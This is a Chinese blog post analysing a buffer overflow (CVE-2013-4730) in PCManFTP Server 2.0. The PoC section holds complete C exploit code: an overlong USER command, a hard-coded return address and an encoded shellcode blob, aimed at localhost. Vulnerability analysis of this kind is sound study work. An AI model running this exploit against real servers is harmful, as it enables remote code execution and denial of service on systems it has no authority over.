PCManFTP v2.0(CVE-2013-4730)漏洞分析報告

原創 capnik 2020-02-25 13:06

軟件名稱:PCManFTP

軟件版本:2.0

漏洞模塊:PCManFTPD2.exe

模塊版本:2.0.0.0

編譯日期:2005-01-01

操作系統:WinXP/2003/7/8.1/10

漏洞編號:CVE-2013-4730

危害等級:中危      

漏洞類型:緩衝區溢出 or 信息泄露

威脅類型:遠程 or 本地

1. 軟件簡介
PCMan's FTP Server是洪任諭程序員所研發的一套FTP服務器軟件。該軟件具有體積小、功能簡單等特點。
軟件界面:



2. 漏洞成因
PCMan's FTP Server 2.0.0版本中存在緩衝區溢出漏洞。此漏洞源於處理精心構造的USER, PASS, STOR, ABOR, CWD命令時,沒有正確驗證用戶提供的輸入,這可使遠程攻擊者造成緩衝區溢出,導致拒絕服務或執行任意代碼。


3. 利用過程
利用FTP傳輸協議,發送USER命令後面跟上一大串字符串,並定位具體溢出點,將溢出點替換爲shellcode以達到利用.
附:訪問控制指令
用戶名(USER):它的參數是用來指定用戶的Telnet字串。它用來進行用戶鑑定,服務器對賦予文件的系統訪問權限。該指令通常是建立數據連接後(有些服務器需要)用戶發出的第一個指令。有些服務器還需要通過password或account指令獲取額外的鑑定信息。服務器允許用戶爲了改變訪問控制和/或帳戶信息而發送新的USER指令。這會導致已經提供的用戶,口令,帳戶信息被清空,重新開始登錄。所有的傳輸參數均不改變,任何正在執行的傳輸進程在舊的訪問控制參數下完成。
口令(PASS):它的參數是用來指定用戶口令的Telnet字符串。 此指令緊跟用戶名指令,在某些站點它是完成訪問控制不可缺少的一步。因爲口令信息非常敏感,所以它的表示通常是被“掩蓋”起來或什麼也不顯示。服務器沒有十分安全的方法達到這樣的顯示效果,因此,user-FTP進程有責任去隱藏敏感的口令信息。

4. PoC(可行性驗證)
首先用windbg的mona2工具生成0x1000大小的有規律數據” Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7……”,然後編寫FTP登陸程序給軟件傳送這段數據,得到溢出偏移值是2010。
構建一個的字符串:"USER "(5字節)+垃圾指令(2005字節)+ 跳板指令(4字節)+ shellcode代碼(不含0x00,0x0A,0x0D,0x20特殊ASCII)+ "\r\n"(2字節)。
demo源代碼:

#include "stdafx.h"
#include <winsock2.h>   
#pragma comment(lib,"Ws2_32.lib")

char bshellcode[] = {
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x33, 0xC0, 0xE8, 0xFF, 0xFF, 0xFF, 0xFF, 0xC3,
	0x58, 0x8D, 0x70, 0x1B, 0x33, 0xC9, 0x66, 0xB9,
	0x17, 0x01, 0x8A, 0x04, 0x0E, 0x34, 0x0B, 0x88,
	0x04, 0x0E, 0xE2, 0xF6, 0x80, 0x34, 0x0E, 0x0B,
	0xFF, 0xE6, 0x88, 0xE7, 0x7B, 0xE0, 0x47, 0x43,
	0x6E, 0x67, 0x67, 0x64, 0x2B, 0x3A, 0x3E, 0x5B,
	0x49, 0x0B, 0x4E, 0x73, 0x62, 0x7F, 0x5B, 0x79,
	0x64, 0x68, 0x6E, 0x78, 0x78, 0x0B, 0x46, 0x6E,
	0x78, 0x78, 0x6A, 0x6C, 0x6E, 0x49, 0x64, 0x73,
	0x4A, 0x0B, 0x47, 0x64, 0x6A, 0x6F, 0x47, 0x62,
	0x69, 0x79, 0x6A, 0x79, 0x72, 0x4E, 0x73, 0x4A,
	0x0B, 0x7E, 0x78, 0x6E, 0x79, 0x38, 0x39, 0x25,
	0x6F, 0x67, 0x67, 0x0B, 0x4C, 0x6E, 0x7F, 0x5B,
	0x79, 0x64, 0x68, 0x4A, 0x6F, 0x6F, 0x79, 0x6E,
	0x78, 0x78, 0x0B, 0xE3, 0x0B, 0x0B, 0x0B, 0x0B,
	0x54, 0x5C, 0x6F, 0x80, 0x3E, 0x3B, 0x0B, 0x0B,
	0x0B, 0x80, 0x7D, 0x07, 0x80, 0x7D, 0x17, 0x80,
	0x3D, 0x80, 0x55, 0x03, 0x80, 0x78, 0x37, 0x08,
	0xF8, 0x80, 0x7D, 0x73, 0x08, 0xF8, 0x80, 0x5D,
	0x13, 0x80, 0x4D, 0x17, 0x08, 0xC8, 0x80, 0x75,
	0x2F, 0x08, 0xF0, 0x5C, 0x80, 0x7D, 0x2B, 0x08,
	0xF8, 0x38, 0xC2, 0x80, 0x37, 0x85, 0x08, 0xF0,
	0xE0, 0x0C, 0x30, 0xC1, 0x4A, 0x7E, 0xFF, 0xE0,
	0x12, 0x5A, 0x5D, 0x80, 0xFC, 0x80, 0x77, 0x2F,
	0x07, 0x88, 0xE4, 0x1F, 0xB2, 0x04, 0x0B, 0x0B,
	0x0B, 0xF7, 0xF8, 0xAD, 0x55, 0x52, 0x7F, 0x08,
	0xE0, 0xEB, 0xC8, 0x54, 0x86, 0x07, 0x44, 0x04,
	0xBC, 0x02, 0x80, 0x0F, 0x83, 0x08, 0xC8, 0x5B,
	0x58, 0x80, 0x77, 0x2F, 0x03, 0x88, 0xE4, 0x25,
	0x5C, 0x58, 0xF4, 0xDB, 0x80, 0x77, 0x2F, 0x03,
	0x88, 0xE4, 0x14, 0x61, 0x0B, 0x61, 0x0B, 0x5C,
	0xF4, 0xDB, 0x80, 0x77, 0x2F, 0x03, 0x88, 0xE4,
	0x31, 0x80, 0x7F, 0x2F, 0x0F, 0x5C, 0x5B, 0xF4,
	0xDD, 0x5B, 0x80, 0x77, 0x2F, 0x07, 0x88, 0xE4,
	0x4D, 0x80, 0x7F, 0x2F, 0x03, 0x80, 0x57, 0x2F,
	0x0F, 0x5C, 0x58, 0xF4, 0xDD, 0x5B, 0x80, 0x77,
	0x2F, 0x1B, 0x86, 0x4C, 0xA4, 0x80, 0x57, 0x2F,
	0x0F, 0x61, 0x0B, 0x5B, 0x5B, 0x61, 0x0B, 0xF4,
	0xD8, 0x80, 0x07, 0x2F, 0x61, 0x0B, 0xF4, 0xDA,
	0x0B
};
int _tmain(int argc, _TCHAR* argv[])
{
	// 1. 初始化Winsock服務
	WSADATA stWSA;
	WSAStartup(0x0202, &stWSA);
	// 2. 創建一個原始套接字
	SOCKET stListen = INVALID_SOCKET;
	stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
	// 3. 在任意地址(INADDR_ANY)上綁定一個端口21
	SOCKADDR_IN stService;
	stService.sin_addr.s_addr = inet_addr("127.0.0.1");
	stService.sin_port = htons(21);
	stService.sin_family = AF_INET;
	connect(stListen, (SOCKADDR*)&stService, sizeof(stService));
	// 4. 接受歡迎語
	char szRecv[0x100] = { 0 };
	char *pCommand = "USER anonymous";
	recv(stListen, szRecv, sizeof(szRecv), 0);
	char cExpolit[5000] = { 0 };
	char cFill[5000] = { 0 };
	memset(cFill, 'A', 2005); 
	sprintf_s(cExpolit, 5000, "%s%s%s%s%s", "USER ",cFill, "\x1D\x11\xBF\x76", bshellcode, "\r\n");  //76BF111D這個是跳板地址,按照具體機型更改
	// 5. 發送登陸請求
	send(stListen, cExpolit, strlen(cExpolit), 0);
	recv(stListen, szRecv, sizeof(szRecv), 0);
	// 6. 關閉相關句柄並釋放相關資源
	closesocket(stListen);
	WSACleanup();
	return 0;
}

5. 結語
緩衝區溢出一般是沒有進行邊界檢查,或使用了不安全的函數,避免這個情況能大大提高安全性。


原程序下載地址:

鏈接:http://pan.baidu.com/s/1i4ASr4p 密碼:xqe3

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

黑客攻擊-木馬程序(3)

聲明:禁止用作非法目的,謝絕一切形式的轉載。 當你在登陸某個網站的時候,當你在用ftp登陸傳輸文件的時候,你的密碼可能已經被嗅探到了。黑客利用網絡嗅探可以獲取大量有用的信息。 文章目錄預備條件網絡抓包代理服務器代理服務器抓包原理網

BurningTeng 2020-07-08 07:19:40

安卓口令紅包漏洞破解方法“如何搶到非蘋果用戶不能搶到的紅包”

      最近在各大媒體網站如微信朋友圈,QQ空間以及一些各種聯盟上都出現了一條“非蘋果用戶不能搶的口令紅包”。該紅包通過利用安卓手機的漏洞實現,而對於蘋果機則不影響。       紅包發生方法如下:              1.在手

J_Anson 2020-07-07 12:30:52

CVE-2016-1503 漏洞分析

CVE-2016-1503 漏洞分析 一、漏洞成因 首先來看一下官方的描述: “A vulnerability in the Dynamic Host Configuration Protocol service cou

Ericky_ 2020-07-07 09:10:22

阿強成長之--漏洞安全

開篇(這種思想很重要) 漏洞不是後來纔出現的,也不一定是碼農的編寫問題和其他因素造成的,他是從一開始就客觀存在的,只是我們沒有發現它,隨着時間的推長和技術的跟新以及技術宅們的利益問題,這才導致漏洞的出現,其實你所發現bug其實一直

阿强成长之路 2020-07-07 00:08:03

利用Redis寫文件權限進行ssh提權登陸linux的漏洞

原理 利用redis的config命令修改rdb文件地址爲ssh密鑰文件,向redis中寫入公共密鑰,通過save命令手動刷新到rdb中,此時就可以用私鑰登陸了 操作 在本地電腦中(linux爲例)生成無密碼的密鑰 ssh-key

Vincent_Field 2020-07-05 06:33:54

Windows XP 命令行 - COPY 命令詳解

將一份或多份文件複製到另一個位置。 COPY [/D] [/V] [/N] [/Y | /-Y] [/Z] [/A | /B ] source [/A | /B] [+ source [/A | /B] [+ ...]] [d

piaolankeke 2020-07-03 22:00:01

strcmp的坑

strcmp的坑 下面的程序是通過對輸入進行判斷,來決定輸出內容的。 # include<stdio.h> #include<string.h> int main(){ printf("請輸入: "); char

BurningTeng 2020-07-03 18:43:21

Ms04011漏洞

呵呵,大家都應知道這個漏洞吧,哈哈,它好厲害哦。HACKER們利用它來可以得到操作系統的administrators權限,得到系統的shell。不多說別的,看看他們都是入何入侵別人的機器吧。   1.  首先,去下載ms04011漏洞溢出

carbon107 2020-07-03 13:42:41

漏洞預警 | Apache AXIS freemarker組件遠程命令執行(哨兵雲支持檢測)

Apache AXIS2是一個基於SOAP的一種Web Service框架。2019年06月16日晚,廣東省安全中心發佈0day漏洞安全預警,Apache AXIS中的freemarker組件中存在遠程命令執行攻擊。默安科技的哨兵

ots安全 2020-07-03 05:38:09

一個簡單的聊天系統

聲明:謝絕一切形式的轉載 socket套接字 socket起源於Unix,而Unix/Linux基本哲學之一就是“一切皆文件”,都可以用“打開open –> 讀寫write/read –> 關閉close”模式來操作。Socket

BurningTeng 2020-07-02 22:16:56

漏洞-Windows-CVE-2020-0796

環境: 目標:192.168.107.74,windows10專業版 1903 攻擊者:192.168.103.61 SMBGhost_RCE_PoC 影響版本: Windows 10 Version 1903 for 32-b

山下南徒 2020-07-01 10:53:47

邏輯漏洞原理

邏輯漏洞是: 網站開發人員再建設網站的時候,由於驗證不嚴格,造成的bug。 邏輯漏洞隱患: 1、任意用戶重置密碼 2、提權/越權 3、任意金額購買 4、驗證碼繞過 提權 查看用戶訂單信息 登錄->常看個人訂單信息 每

IT—INTEREST_程序员 2020-07-01 04:33:48

XXE漏洞——xml外部實體注入XXE

XXE: XXE全稱XML External Entity Injection,也就是XML外部實體注入攻擊,漏洞是對非安全的外部實體數據進行處理時引發的安全問題。要了解XXE,就必須懂得XML的一些規則。 XML是用於標記電子文件使其

IT—INTEREST_程序员 2020-07-01 04:33:48

SSRF漏洞——原理-挖掘

SSRF-漏洞 SSRF漏洞:SSRF(Server-Side Request Forgery:服務器端請求僞造) 是一種由惡意訪問者構造形成由服務端發起請求的一個安全漏洞。 一般情況下,SSRF訪問的目標是從外網無法訪問的內部系統

IT—INTEREST_程序员 2020-07-01 04:33:48

漏洞掃描之OpenVas

切忌不要使用文章涉及的技術進行非法事情。 OpenVas安裝 基於Kali進行安裝。 1.Kali升級 apt-get update apt-get dist-upgrade 2.OpenVas安裝 apt-get insta

BurningTeng 2020-06-29 05:05:52